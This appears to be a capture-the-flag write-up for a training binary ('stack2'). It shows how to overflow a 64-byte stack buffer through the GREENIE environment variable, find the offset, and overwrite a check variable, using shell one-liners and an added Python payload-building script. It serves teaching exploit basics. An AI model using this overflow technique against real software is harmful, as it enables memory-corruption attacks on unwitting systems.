The goal of this challenge is to overflow a stack buffer from the contents of an environment variable so that the adjacent “modified” variable ends up holding the value the program checks for, which makes it print the winning statement.
Things to note
variable = getenv("GREENIE");: The getenv() call looks up the environment variable named “GREENIE” and returns a pointer to its string value (the challenge exits if it is not set).
modified = 0: The “modified” variable is explicitly set to 0 before the copy, so only the overflow can change it.
strcpy(buffer, variable);: This is the vulnerable call. strcpy() copies the environment string into buffer with no length check, so if the value is longer than the 64 bytes reserved for it (char buffer[64];), the copy runs past the end of the buffer and into the neighbouring stack variable, which is the BOF.
Setting Environment Variable
In Linux, you can set an environment variable and its value with the export builtin and read it back with echo:
$ export GREENIE='bigb0ss' # Setting Environment Variable
$ echo $GREENIE # Printing the value
When the value is 64 bytes or shorter, the program always prints “0x00000000” because “modified” is untouched; a value longer than 64 bytes overflows the buffer and changes the “modified” value.
$ export GREENIE='bigb0ss'
Try again, you got 0x00000000
$ export GREENIE=$(python -c 'print "A" * 70')
Try again, you got 0x41414141
The exploit workflow is essentially the same as stack1: find the offset from the start of buffer to “modified,” then overwrite “modified” with “0x0d0a0d0a,” the value the program compares against.
To find the offset,
$ export GREENIE=$(python -c 'print "A" * 60 + "BBBBCCCCDDDD"')
Try again, you got 0x43434343
The “modified” value is now overwritten with “0x43434343” (0x43 is “C”); hence we know that the offset is 64 (60 bytes of padding + “BBBB”).
Next, convert the target value into the raw bytes that must land in memory. Since x86 is little-endian, the least significant byte is stored first, so “0x0d0a0d0a” becomes the byte sequence 0x0a 0x0d 0x0a 0x0d, which is “\n\r\n\r” in ASCII. Two constraints to keep in mind: an environment string is a NUL-terminated C string, so the payload cannot contain a 0x00 byte, and the $(...) command substitution strips trailing newlines, so the payload must not end in “\n” (here the last byte is “\r,” so it survives). Putting it all together, let’s exploit stack2 and print out the winning statement:
$ export GREENIE=$(python -c 'print "A" * 64 + "\n\r\n\r"')
you have correctly modified the variable
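The same two steps (recovering the offset from the leaked value, then packing the target little-endian at that offset) as a small Python 3 script. This is an added example, not code from the original post; it assumes the 64-byte layout and the 0x0d0a0d0a target shown above, and the file name stack2_payload.py is hypothetical. Unlike the Python 2 one-liners used on the page, it writes raw bytes via sys.stdout.buffer so the payload is not re-encoded.

```python
import struct
import sys

# Values taken from the challenge: stack2 compares "modified" against this
# constant, and the page's offset-finding run used this marker pattern.
TARGET = 0x0d0a0d0a
PATTERN = b"BBBBCCCCDDDD"


def find_offset(padding, pattern, leaked):
    """Recover the distance from the start of buffer to "modified".

    `padding` is the number of filler bytes sent before `pattern`, and
    `leaked` is the integer the program printed back ("Try again, you got
    0x43434343"). The four leaked bytes are the little-endian image of the
    four pattern bytes that landed on "modified"; undoing the byte order and
    locating them in the pattern gives the offset.
    """
    landed = struct.pack("<I", leaked)  # the bytes as they sat in memory
    pos = pattern.find(landed)
    if pos < 0:
        raise ValueError("leaked value not found in the pattern")
    return padding + pos


def build_payload(offset, value):
    """Filler up to `offset`, then `value` packed little-endian."""
    payload = b"A" * offset + struct.pack("<I", value)
    # getenv() returns a C string: a 0x00 byte would end the payload early.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte")
    # $(...) strips trailing newlines, so a payload ending in 0x0a arrives
    # one byte short.
    if payload.endswith(b"\n"):
        raise ValueError("payload ends in a newline; $(...) would strip it")
    return payload


if __name__ == "__main__":
    # 60 bytes of padding plus the pattern leaked 0x43434343 ("CCCC").
    offset = find_offset(60, PATTERN, 0x43434343)
    sys.stdout.buffer.write(build_payload(offset, TARGET))
```

Usage (file name assumed): `export GREENIE=$(python3 stack2_payload.py); ./stack2`. The two checks in build_payload() are what would bite in practice here: a target containing a zero byte cannot be delivered through an environment variable at all, and a target whose low-order byte is 0x0a would lose that byte to the shell before the program ever saw it.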
GDB (*Handwritten)
Doing this by hand in GDB also helps to better understand how the program operates. (Sorry for the watermarks. I accidentally placed this on my kitchen table… -_-)
Thanks for reading!
- Stack 3 — Stack-based BOF: Basic 3